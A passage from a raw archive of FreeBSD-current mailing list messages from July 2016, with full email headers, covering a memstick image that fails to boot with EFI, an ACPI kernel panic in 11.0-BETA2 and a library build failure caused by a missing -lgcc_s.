e8FQugq2JZQCatWPs6HVrZDGkpMZBZl1et8SO7B8Lw+ruJI+EdGHSn8vI+JPzpoOgJLc kMTxyInbKV1qX19zDGMRppE2k1nmrQ3mkJPK8aWE8b5680tjTlX6hvri++MI3tfSwfK+ DUkFnsjA0nsKKjZqmAGfZa2cjmRIINmBsqocf2S2eln9tgECkxcmhGAagEwywwgeEYWm F6RA== X-Gm-Message-State: AEkoouvixJ6BP0tVdAEs3Oj46J12A2nCtTqY99tdqrw4MK2Ks9V5LHhVyDcGQQgalA+uAOGXnVLn78RZa7rEJQ== X-Received: by 10.31.167.133 with SMTP id q127mr9090234vke.101.1469590394731; Tue, 26 Jul 2016 20:33:14 -0700 (PDT) MIME-Version: 1.0 Received: by 10.103.92.129 with HTTP; Tue, 26 Jul 2016 20:33:14 -0700 (PDT) In-Reply-To: References: From: Howard Su Date: Wed, 27 Jul 2016 11:33:14 +0800 Message-ID: Subject: Fwd: Failed to boot -Current snapshot memstick img with EFI To: freebsd-current@freebsd.org, freebsd-stable@freebsd.org Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable X-Content-Filtered-By: Mailman/MimeDel 2.1.22 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 27 Jul 2016 03:33:16 -0000 The same issue is still there in 11-BETA2. I tried the memstick image for amd64. I got the exact same error (with boot -v). =E2=80=8BGEOM_PART: last LBA is below first LBA: 0 < 32 GEOM_PART: integrity check failed (da0, MBR) This make mem stick image totally useless. Anyone take a look? I am happy to provide more information. Thanks, Howard ---------- Forwarded message ---------- From: Howard Su Date: Sat, Apr 23, 2016 at 10:40 PM Subject: Failed to boot -Current snapshot memstick img with EFI To: "freebsd-current@freebsd.org" The issue is partition table in img is wrong so that GEOM cannot discover the partitions. Detailed error: =E2=80=8B=E2=80=8B GEOM_PART: last LBA is below first LBA: 0 < 32 GEOM_PART: integrity check failed (da0, MBR) I tried this month and last month memstick img. both has same problem. Any idea on the issue? -Howard --=20 -Howard --=20 -Howard From owner-freebsd-current@freebsd.org Wed Jul 27 03:35:04 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 0C503BA68E2 for ; Wed, 27 Jul 2016 03:35:04 +0000 (UTC) (envelope-from allanjude@freebsd.org) Received: from mx1.scaleengine.net (mx1.scaleengine.net [209.51.186.6]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id C69D3174E for ; Wed, 27 Jul 2016 03:35:03 +0000 (UTC) (envelope-from allanjude@freebsd.org) Received: from [10.1.1.2] (unknown [10.1.1.2]) (Authenticated sender: allanjude.freebsd@scaleengine.com) by mx1.scaleengine.net (Postfix) with ESMTPSA id 5E86E1F53 for ; Wed, 27 Jul 2016 03:35:02 +0000 (UTC) Subject: Re: Fwd: Failed to boot -Current snapshot memstick img with EFI To: freebsd-current@freebsd.org References: From: Allan Jude Message-ID: Date: Tue, 26 Jul 2016 23:34:58 -0400 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Thunderbird/45.2.0 MIME-Version: 1.0 In-Reply-To: Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="H1WpersKox4vXP9oJKCeqQrUkNjfQNaUW" X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 27 Jul 2016 03:35:04 -0000 This is an OpenPGP/MIME signed message (RFC 4880 and 3156) --H1WpersKox4vXP9oJKCeqQrUkNjfQNaUW Content-Type: multipart/mixed; boundary="LKoAODb4hU37ajrVdlpE9PdgQ2XxlNWQ3" From: Allan Jude To: freebsd-current@freebsd.org Message-ID: Subject: Re: Fwd: Failed to boot -Current snapshot memstick img with EFI References: In-Reply-To: --LKoAODb4hU37ajrVdlpE9PdgQ2XxlNWQ3 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable On 2016-07-26 23:33, Howard Su wrote: > The same issue is still there in 11-BETA2. I tried the memstick image f= or > amd64. I got the exact same error (with boot -v). > =E2=80=8BGEOM_PART: last LBA is below first LBA: 0 < 32 > GEOM_PART: integrity check failed (da0, MBR) >=20 > This make mem stick image totally useless. Anyone take a look? I am hap= py > to provide more information. >=20 > Thanks, >=20 > Howard >=20 > ---------- Forwarded message ---------- > From: Howard Su > Date: Sat, Apr 23, 2016 at 10:40 PM > Subject: Failed to boot -Current snapshot memstick img with EFI > To: "freebsd-current@freebsd.org" >=20 >=20 > The issue is partition table in img is wrong so that GEOM cannot discov= er > the partitions. >=20 > Detailed error: > =E2=80=8B=E2=80=8B > GEOM_PART: last LBA is below first LBA: 0 < 32 > GEOM_PART: integrity check failed (da0, MBR) >=20 > I tried this month and last month memstick img. both has same problem. = Any > idea on the issue? >=20 > -Howard >=20 The last LBA is being reported as 0, which is obviously bogus. How big is the USB device you have written the memstick to? --=20 Allan Jude --LKoAODb4hU37ajrVdlpE9PdgQ2XxlNWQ3-- --H1WpersKox4vXP9oJKCeqQrUkNjfQNaUW Content-Type: application/pgp-signature; name="signature.asc" Content-Description: OpenPGP digital signature Content-Disposition: attachment; filename="signature.asc" -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.22 (MingW32) iQIcBAEBAgAGBQJXmCvlAAoJEBmVNT4SmAt+8voP/2Wt1uQQT4kWMsflHWXE7F9H zyezhjl41iFB7vQASgEQ0wBnJKqfqD06GtuMHEdES5wI/eWXXe5VVbTob3Sqjnf9 15MK0EcXoY/efnWV6Ph/prVO3dotbtiPxwi333A4WzFPweE8P3ZXy6aQB18Dg4VO dVyaan2fbQO6mr1ZsUA1A75dG7sn3FRkzvqRwu2e+UM3NKfFVeoXEQvg6D/Qoqhv NCzJQrQVBW1b2tGcM53BunhRXiBA0AUT16Xaxg/f96WX9kiY6ZQXQll6IxXAfQRI sTsVRVPhhPtveLiF5t15hBAZQ0ZX5CO50t85xPiANqQ5mfbve+0NimRbdIA6reCu C+7ESN7dwqKFtYpmPubzpia6ucFrUpIYHLeuK+Mh4F/esqVaHnGJ870Lebme/RHU 23+el/oWDqRspH0QqLtc7gnn/9bSYtNj1qacCxtJPZfYgpg3xyfjTd6zHLFRD+Od 8jQA/wZ1HHrdV6vKIIAiDs3tOxEYACT0bkDnGaMHm+oefnWN6/IFtQuXh/1VXsLr kvjgeSh//yF+KNBap6Hwpvz4nq4nbFNap2UC02r1ilRbeBR6NzhyFFaE/qe9y2U9 ddsu3AdqkMuijLVOxMT0+lVo5N6il1Zm1K48bpALWPoIo2ZyQw9oGp9I+ScuBKUq sleMYncIHa0K/8VAktu0 =Hr7A -----END PGP SIGNATURE----- --H1WpersKox4vXP9oJKCeqQrUkNjfQNaUW-- From owner-freebsd-current@freebsd.org Wed Jul 27 04:21:35 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 64F6DA7A53A for ; Wed, 27 Jul 2016 04:21:35 +0000 (UTC) (envelope-from howard0su@gmail.com) Received: from mail-ua0-x22a.google.com (mail-ua0-x22a.google.com [IPv6:2607:f8b0:400c:c08::22a]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 3377B17A1; Wed, 27 Jul 2016 04:21:35 +0000 (UTC) (envelope-from howard0su@gmail.com) Received: by mail-ua0-x22a.google.com with SMTP id l32so9832783ual.2; Tue, 26 Jul 2016 21:21:35 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:references:in-reply-to:from:date:message-id:subject:to; bh=v4C1AkPqJvWoE59aNiJkj9VRpuV/FwBzk0TW/cnOA7A=; b=IdUJN22FdJwmEO+DIdVyHwn3cDxCKuNPC/U5n50shu6izRwNxOfj5bJ5YRf1q1KRIE /LcsZCKxR7CuqiQFR+QYU5bc82yMwUKH0uj124oW7yxi6vwsTxDgZALS/zYE7sxguc/Y gdHiz96km4FQqS0lxkJo9vKMKikUirrCBGM67I721BtWMdEdmj5qG7I+dfTL1mCvHJAx oBFZlq3vKbXtvVzMn9kX037Oy/I2jOT4sbcFo8ULJG26l0ukA//dGKPYBx8IfEM3t+gt CRcy7w1x/yD5jJodjCQsZrKniBn7PBGV9+6eVKxZdoHvLgd/ORhlzZVt/DpHtFE8VOA7 bZMA== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:mime-version:references:in-reply-to:from:date :message-id:subject:to; bh=v4C1AkPqJvWoE59aNiJkj9VRpuV/FwBzk0TW/cnOA7A=; b=Hb0xLCNHYp8IN+38Jqteiz9jqzg6ZwSejaSdO8Adr8CAFoCHwrVTifGqm94DAkZDb6 9TeukfPL6Rm+AERgyNKHbEiLcRU3v7EMbIhB28lCZzUKnsEPs/pyDQ7BElTopZ7SkLUr K7FEotG28T8hgSUHbyC8ARSLynJbm2KBDc6c7V7m9/UKan/NegF6N4C6x24cND0RiU04 rEVEXCre8qNaRsXZ/STUWY17uuUtZBonEWwfybN1jkIgrTOsi+iNDl6t96uNdLt92ieW il+ogJtqZnCefOvsvCwYMthAOY8I+5ESpqRWAS7Pn3cCHPEAeji5ONmJeJ8OEqmOyXTW bgJQ== X-Gm-Message-State: AEkoousiHmKZGow4MIOw/sfTzZ7K4RZMASlM/NFpInOGxE3O5uQsPmWZMQPWuZAVdexeC8vmw3xZWGkLALnvIA== X-Received: by 10.176.2.87 with SMTP id 81mr11606303uas.57.1469593294021; Tue, 26 Jul 2016 21:21:34 -0700 (PDT) MIME-Version: 1.0 References: In-Reply-To: From: Howard Su Date: Wed, 27 Jul 2016 04:21:24 +0000 Message-ID: Subject: Re: Fwd: Failed to boot -Current snapshot memstick img with EFI To: Allan Jude , freebsd-current@freebsd.org Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable X-Content-Filtered-By: Mailman/MimeDel 2.1.22 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 27 Jul 2016 04:21:35 -0000 8GB Allan Jude =E4=BA=8E2016=E5=B9=B47=E6=9C=8827=E6=97= =A5=E5=91=A8=E4=B8=89 =E4=B8=8A=E5=8D=8811:35=E5=86=99=E9=81=93=EF=BC=9A > On 2016-07-26 23:33, Howard Su wrote: > > The same issue is still there in 11-BETA2. I tried the memstick image f= or > > amd64. I got the exact same error (with boot -v). > > =E2=80=8BGEOM_PART: last LBA is below first LBA: 0 < 32 > > GEOM_PART: integrity check failed (da0, MBR) > > > > This make mem stick image totally useless. Anyone take a look? I am hap= py > > to provide more information. > > > > Thanks, > > > > Howard > > > > ---------- Forwarded message ---------- > > From: Howard Su > > Date: Sat, Apr 23, 2016 at 10:40 PM > > Subject: Failed to boot -Current snapshot memstick img with EFI > > To: "freebsd-current@freebsd.org" > > > > > > The issue is partition table in img is wrong so that GEOM cannot discov= er > > the partitions. > > > > Detailed error: > > =E2=80=8B=E2=80=8B > > GEOM_PART: last LBA is below first LBA: 0 < 32 > > GEOM_PART: integrity check failed (da0, MBR) > > > > I tried this month and last month memstick img. both has same problem. > Any > > idea on the issue? > > > > -Howard > > > > The last LBA is being reported as 0, which is obviously bogus. > > How big is the USB device you have written the memstick to? > > -- > Allan Jude > > -- -Howard From owner-freebsd-current@freebsd.org Wed Jul 27 09:23:18 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id A9A83BA6753; Wed, 27 Jul 2016 09:23:18 +0000 (UTC) (envelope-from peter@rulingia.com) Received: from vps.rulingia.com (vps.rulingia.com [103.243.244.15]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client CN "rulingia.com", Issuer "Let's Encrypt Authority X3" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 38A3B1D41; Wed, 27 Jul 2016 09:23:11 +0000 (UTC) (envelope-from peter@rulingia.com) Received: from server.rulingia.com (ppp59-167-167-3.static.internode.on.net [59.167.167.3]) by vps.rulingia.com (8.15.2/8.15.2) with ESMTPS id u6R9MvVI011671 (version=TLSv1.2 cipher=DHE-RSA-AES256-GCM-SHA384 bits=256 verify=OK); Wed, 27 Jul 2016 19:23:02 +1000 (AEST) (envelope-from peter@rulingia.com) X-Bogosity: Ham, spamicity=0.000000 Received: from server.rulingia.com (localhost.rulingia.com [127.0.0.1]) by server.rulingia.com (8.15.2/8.15.2) with ESMTPS id u6R9MopP026503 (version=TLSv1.2 cipher=DHE-RSA-AES256-GCM-SHA384 bits=256 verify=NO); Wed, 27 Jul 2016 19:22:50 +1000 (AEST) (envelope-from peter@server.rulingia.com) Received: (from peter@localhost) by server.rulingia.com (8.15.2/8.15.2/Submit) id u6R9MocG026502; Wed, 27 Jul 2016 19:22:50 +1000 (AEST) (envelope-from peter) Date: Wed, 27 Jul 2016 19:22:50 +1000 From: Peter Jeremy To: FreeBSD-current@FreeBSD.org, FreeBSD-stable@FreeBSD.org Subject: FreeBSD 11.0-BETA2 won't boot on an Acer Aspire 5560 Message-ID: <20160727092250.GA25910@server.rulingia.com> MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha512; protocol="application/pgp-signature"; boundary="AhhlLboLdkugWU4S" Content-Disposition: inline X-PGP-Key: http://www.rulingia.com/keys/peter.pgp User-Agent: Mutt/1.6.1 (2016-04-27) X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 27 Jul 2016 09:23:18 -0000 --AhhlLboLdkugWU4S Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable I'm trying to boot the 11.0-BETA2/amd64 memory stick image and the kernel panics: (Following copied by hand): ACPI APIC Table: =2E.. acpi0: on motherboard ACPI Error: Hardware did not change modes (20160527/hwacpi-160) ACPI Error: Could not transition to APCI mode (20160527/evxfevnt-105) ACPI Warning: AcpiEnable failed (20160527/utxfinit-184) acpi0: Could not enable ACPI: AE_NO_HARDWARE_RESPONSE device_attach: acpi0 attach returned 6 Followed by a NULL dereference panic at nexus_acpi_attach+0x89 The system boots a 10.0-RELEASE/amd64 memstick (the only other image I have conveniently to date) without problem. --=20 Peter Jeremy --AhhlLboLdkugWU4S Content-Type: application/pgp-signature; name="signature.asc" -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQJ8BAEBCgBmBQJXmH1qXxSAAAAAAC4AKGlzc3Vlci1mcHJAbm90YXRpb25zLm9w ZW5wZ3AuZmlmdGhob3JzZW1hbi5uZXRFRUIyOTg2QzMwNjcxRTc0RTY1QzIyN0Ux NkE1OTdBMEU0QTIwQjM0AAoJEBall6Dkogs0FT8P/A7fvDOBDrzh7wULPvcUtlb2 dVDMrmLIO1awYU48ElmaWg4XWWh8VhdUQ87IaJX3iVf5nLkm/vccftbMFAqy8nwA 8/oQ3azRAr/J60YNvqJcT2CWOuou3hSGH48f9Wa0pcturuaAdvGH8GS0QO0VBWIL C3cQ24lSC+cynW6/blV4xk5IQ0bF4R7wln7vrMivDtddEO650GQE6MJEcj8aU4U0 Ws4V/pnDzkFYonPnOQrxMt9GIkwGi0LQ+JRXb5c9Cof+3jJKeqVuwrUlHG2jdkhZ WolX8tBns0EdVcvAwT6xN0fn8zeGN15Hs61Y4Iy8IlxRVT8vz4RhMgGU8F9IZSGr 4rw76/oX2JqLc8ZgqL/c0LD0lH6sOM34PkZAkOwmeRiiQDARVNBtVjePkpN4H8kE ycA55QMheMkjP7ldGfb1ZzvjHqEQIYLSK0k/rosCA1L2OtVnhFuh+MZss4rbB39E p0ZSG6cPHOr80tU2U6waxFa5PI7nqbc4mgLyikfwUK4vgJJfCt/j2zuesHd5U3HN bv1PWabIIoKKu2f0YWPDAxRmUWgiWiQrAcb9qTp7Bv0GvhMxsk+wbt8ajeOGdQg2 YnzdlbdTWE4zaZstm4DjqUL8gx6o5XDa0lpRRO7Q7IDDu9xtXT4oZtSOEjXFEQE+ NrKrykoZnObWCVdcOyk8 =0MVF -----END PGP SIGNATURE----- --AhhlLboLdkugWU4S-- From owner-freebsd-current@freebsd.org Wed Jul 27 12:18:20 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 8C7BBBA5A77; Wed, 27 Jul 2016 12:18:20 +0000 (UTC) (envelope-from koobs.freebsd@gmail.com) Received: from mail-pa0-x231.google.com (mail-pa0-x231.google.com [IPv6:2607:f8b0:400e:c03::231]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 5B77612D9; Wed, 27 Jul 2016 12:18:20 +0000 (UTC) (envelope-from koobs.freebsd@gmail.com) Received: by mail-pa0-x231.google.com with SMTP id ks6so10125506pab.0; Wed, 27 Jul 2016 05:18:20 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=sender:reply-to:subject:references:to:from:message-id:date :user-agent:mime-version:in-reply-to:content-transfer-encoding; bh=nbGBOhiN2sd/ERLCnr6Gr4zHrU3oTypAGZ2cOfaocY0=; b=JPkDdvuHZDbOhyNIck3lrliX0mPUN3dTqC9oGyGifCCNtRwRZtcmMDe0VIdf1LMiui PrVK8gsmCbM5eaQ3vJRt7K27buC6zwTftd3GjJuxc+aQ1mmj5Ab3+/uacaExaoI9ouwu UrzCn8iliSt342pUbJbe/gRlTayUIyrOF19M+w5PBmLIsB1II+kKj5YbbmMCsCZvqWHq 4txrQaTYYnJgd+eaSH1PgLJZRqkUqqIc2XhIUu1srDmQc0S7LVyUIyr/qB8iygaMcmTF Y/7Kio84e48HkYi8athItsgrrXWRkr/XpsdCldrtLaOiMJuXe/r07nMfSEmHFmH247f3 G39A== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:sender:reply-to:subject:references:to:from :message-id:date:user-agent:mime-version:in-reply-to :content-transfer-encoding; bh=nbGBOhiN2sd/ERLCnr6Gr4zHrU3oTypAGZ2cOfaocY0=; b=bTidg89lI64EXKvCWsWddj6KBzmklu6XeWLx4AHHISIJLEJ7D3tTa6usDR7tS0G6gi eRiYD5r2HOkpxjL8ZBK04QX3bprmxiBU6OySjuCZS1LK817DScprwRVJbwgz6OIxw4Za fi1UxGASGuV+6wd4ULDUBgsj7GSPl1rE1XJ/p1LDe+PNvdtZSfW2BqjDroDXnFcKyy1d 9zLqkXCS7C1kRp1nG5oNoHGajTOgFSNLX4n5vGjEVUhg39xrIKsdAh79aqSb+zcMJ9W7 Re8u8Ak4SXTXsNAB8p+ZEd2AdU+JCyuTNVq2niS1wI+o+I9yPDwTymfRKNl8EkBsdS5H VYQw== X-Gm-Message-State: AEkoous4PE/3MnX+0AE+Wjwe3u5jV9GZtssIA9OVUJ7kMqEIHQIPhvp6fZpGlAzMeZJN7Q== X-Received: by 10.66.165.67 with SMTP id yw3mr49289888pab.8.1469621899632; Wed, 27 Jul 2016 05:18:19 -0700 (PDT) Received: from ?IPv6:2001:44b8:31ae:7b01:f985:3c4b:2a0c:8bea? (2001-44b8-31ae-7b01-f985-3c4b-2a0c-8bea.static.ipv6.internode.on.net. [2001:44b8:31ae:7b01:f985:3c4b:2a0c:8bea]) by smtp.gmail.com with ESMTPSA id u72sm8969583pfa.31.2016.07.27.05.18.17 (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128); Wed, 27 Jul 2016 05:18:18 -0700 (PDT) Sender: Kubilay Kocak Reply-To: koobs@FreeBSD.org Subject: Re: FreeBSD 11.0-BETA2 won't boot on an Acer Aspire 5560 References: <20160727092250.GA25910@server.rulingia.com> To: Peter Jeremy , FreeBSD-current@FreeBSD.org, FreeBSD-stable@FreeBSD.org From: Kubilay Kocak Message-ID: Date: Wed, 27 Jul 2016 22:18:13 +1000 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Thunderbird/49.0a2 MIME-Version: 1.0 In-Reply-To: <20160727092250.GA25910@server.rulingia.com> Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 27 Jul 2016 12:18:20 -0000 On 27/07/2016 7:22 PM, Peter Jeremy wrote: > I'm trying to boot the 11.0-BETA2/amd64 memory stick image and the > kernel panics: (Following copied by hand): > > ACPI APIC Table: > ... > acpi0: on motherboard > ACPI Error: Hardware did not change modes (20160527/hwacpi-160) > ACPI Error: Could not transition to APCI mode (20160527/evxfevnt-105) > ACPI Warning: AcpiEnable failed (20160527/utxfinit-184) > acpi0: Could not enable ACPI: AE_NO_HARDWARE_RESPONSE > device_attach: acpi0 attach returned 6 > > Followed by a NULL dereference panic at nexus_acpi_attach+0x89 > > The system boots a 10.0-RELEASE/amd64 memstick (the only other image I > have conveniently to date) without problem. > Thank you for the report Peter Did it boot prior to 11.0-BETA2? ie; is it a regression? Please report a bug in bugzilla with version: 11.0-BETA2 and cc re@FreeBSD.org If it's possible to obtain a backtrace of the panic, please include it as an attachment: https://www.freebsd.org/doc/en_US.ISO8859-1/books/developers-handbook/kerneldebug.html Setting debug.debugger_on_panic=1 in loader may help get it to the debugger. From owner-freebsd-current@freebsd.org Wed Jul 27 12:50:03 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id DBD2EBA646D for ; Wed, 27 Jul 2016 12:50:03 +0000 (UTC) (envelope-from david@catwhisker.org) Received: from mailman.ysv.freebsd.org (unknown [127.0.1.3]) by mx1.freebsd.org (Postfix) with ESMTP id C725A180C for ; Wed, 27 Jul 2016 12:50:03 +0000 (UTC) (envelope-from david@catwhisker.org) Received: by mailman.ysv.freebsd.org (Postfix) id C2D5FBA646C; Wed, 27 Jul 2016 12:50:03 +0000 (UTC) Delivered-To: current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id C2713BA646B for ; Wed, 27 Jul 2016 12:50:03 +0000 (UTC) (envelope-from david@catwhisker.org) Received: from albert.catwhisker.org (mx.catwhisker.org [198.144.209.73]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id 7469F180A; Wed, 27 Jul 2016 12:50:02 +0000 (UTC) (envelope-from david@catwhisker.org) Received: from albert.catwhisker.org (localhost [127.0.0.1]) by albert.catwhisker.org (8.15.2/8.15.2) with ESMTP id u6RCnuXx040509; Wed, 27 Jul 2016 12:49:56 GMT (envelope-from david@albert.catwhisker.org) Received: (from david@localhost) by albert.catwhisker.org (8.15.2/8.15.2/Submit) id u6RCnukM040508; Wed, 27 Jul 2016 05:49:56 -0700 (PDT) (envelope-from david) Date: Wed, 27 Jul 2016 05:49:56 -0700 From: David Wolfskill To: current@freebsd.org Subject: Possible race condition building libraries: head/amd64 r303329 -> r303379 Message-ID: <20160727124956.GV1294@albert.catwhisker.org> Mail-Followup-To: David Wolfskill , current@freebsd.org MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha512; protocol="application/pgp-signature"; boundary="2+XEzv9QEhmMrrEN" Content-Disposition: inline User-Agent: Mutt/1.6.1 (2016-04-27) X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 27 Jul 2016 12:50:04 -0000 --2+XEzv9QEhmMrrEN Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable I track head daily on both my laptop and a "build machine;" I only saw a problem on the latter -- not on my laptop. (The build machine is a bit beefier, and uses an SSD as its non-volatile storage; the laptop uses a hybrid disk -- in case that is useful.) As indicated in the Subject, in each case I was performing a source-based upgrade-in-place from r303329 to r303379. (And I've been doing this routinely for quite some time.) The build failed (initially -- a restart worked): =2E.. >>> stage 4.2: building libraries =2E.. --- secure/lib/libcrypto__L --- Building /common/S4/obj/usr/src/secure/lib/libcrypto/dso_openssl.o --- lib/ncurses/ncursesw__L --- /usr/lib/libtermlibw.so -> libncursesw.so /usr/lib/libtinfow.so -> libncursesw.so --- kerberos5/lib/libwind__L --- Building /common/S4/obj/usr/src/kerberos5/lib/libwind/normalize_table.So --- kerberos5/lib/libheimipcc__L --- /usr/obj/usr/src/tmp/usr/bin/ld: cannot find -lgcc_s cc: error: linker command failed with exit code 1 (use -v to see invocation) *** [libprivateheimipcc.so.11] Error code 1 bmake[4]: stopped in /usr/src/kerberos5/lib/libheimipcc =2EERROR_TARGET=3D'libprivateheimipcc.so.11' =2EERROR_META_FILE=3D'/common/S4/obj/usr/src/kerberos5/lib/libheimipcc/libp= rivateheimipcc.so.11.meta' =2EMAKE.LEVEL=3D'4' MAKEFILE=3D'' =2EMAKE.MODE=3D'meta missing-filemon=3Dyes missing-meta=3Dyes silent=3Dyes = verbose' =2ECURDIR=3D'/usr/src/kerberos5/lib/libheimipcc' =2EMAKE=3D'/usr/obj/usr/src/make.amd64/bmake' =2EOBJDIR=3D'/usr/obj/usr/src/kerberos5/lib/libheimipcc' =2ETARGETS=3D'all' DESTDIR=3D'/usr/obj/usr/src/tmp' LD_LIBRARY_PATH=3D'' MACHINE=3D'amd64' MACHINE_ARCH=3D'amd64' MAKEOBJDIRPREFIX=3D'/usr/obj' MAKESYSPATH=3D'/usr/src/share/mk' MAKE_VERSION=3D'20160604' PATH=3D'/usr/obj/usr/src/tmp/legacy/usr/sbin:/usr/obj/usr/src/tmp/legacy/us= r/bin:/usr/obj/usr/src/tmp/legacy/bin:/usr/obj/usr/src/tmp/usr/sbin:/usr/ob= j/usr/src/tmp/usr/bin:/sbin:/bin:/usr/sbin:/usr/bin' SRCTOP=3D'/usr/src' OBJTOP=3D'/usr/obj/usr/src' =2EMAKE.MAKEFILES=3D'/usr/src/share/mk/sys.mk /usr/src/share/mk/local.sys.e= nv.mk /usr/src/share/mk/src.sys.env.mk /etc/src-env.conf /usr/src/share/mk/= bsd.mkopt.mk /etc/make.conf /usr/src/share/mk/local.sys.mk /usr/src/share/m= k/src.sys.mk /etc/src.conf /usr/src/kerberos5/lib/libheimipcc/Makefile /usr= /src/share/mk/bsd.lib.mk /usr/src/share/mk/bsd.init.mk /usr/src/share/mk/bs= d.opts.mk /usr/src/share/mk/bsd.cpu.mk /usr/src/share/mk/local.init.mk /usr= /src/share/mk/src.init.mk /usr/src/kerberos5/lib/libheimipcc/../Makefile.in= c /usr/src/kerberos5/lib/libheimipcc/../../Makefile.inc /usr/src/share/mk/s= rc.opts.mk /usr/src/share/mk/bsd.own.mk /usr/src/share/mk/bsd.compiler.mk /= usr/src/share/mk/bsd.compiler.mk /usr/src/share/mk/bsd.libnames.mk /usr/src= /share/mk/src.libnames.mk /usr/src/share/mk/bsd.symver.mk /usr/src/share/mk= /bsd.nls.mk /usr/src/share/mk/bsd.files.mk /usr/src/share/mk/bsd.incs.mk /u= sr/src/share/mk/bsd.confs.mk /usr/src/share/mk/bsd.links.mk /usr/src/share/= mk/bsd.dep.mk /usr/src/share/mk/bsd.clang-analyze.mk /usr/src/share/mk/bsd.= obj.mk /usr/src/share/mk/bsd.subdir.mk /usr/src/share/mk/bsd.sys.mk' =2EPATH=3D'. /usr/src/kerberos5/lib/libheimipcc /usr/src/kerberos5/lib/libh= eimipcc/../../../crypto/heimdal/lib/ipc' 1 error bmake[4]: stopped in /usr/src/kerberos5/lib/libheimipcc =2EERROR_TARGET=3D'libprivateheimipcc.so.11' =2EERROR_META_FILE=3D'/common/S4/obj/usr/src/kerberos5/lib/libheimipcc/libp= rivateheimipcc.so.11.meta' =2EMAKE.LEVEL=3D'4' MAKEFILE=3D'' =2EMAKE.MODE=3D'meta missing-filemon=3Dyes missing-meta=3Dyes silent=3Dyes = 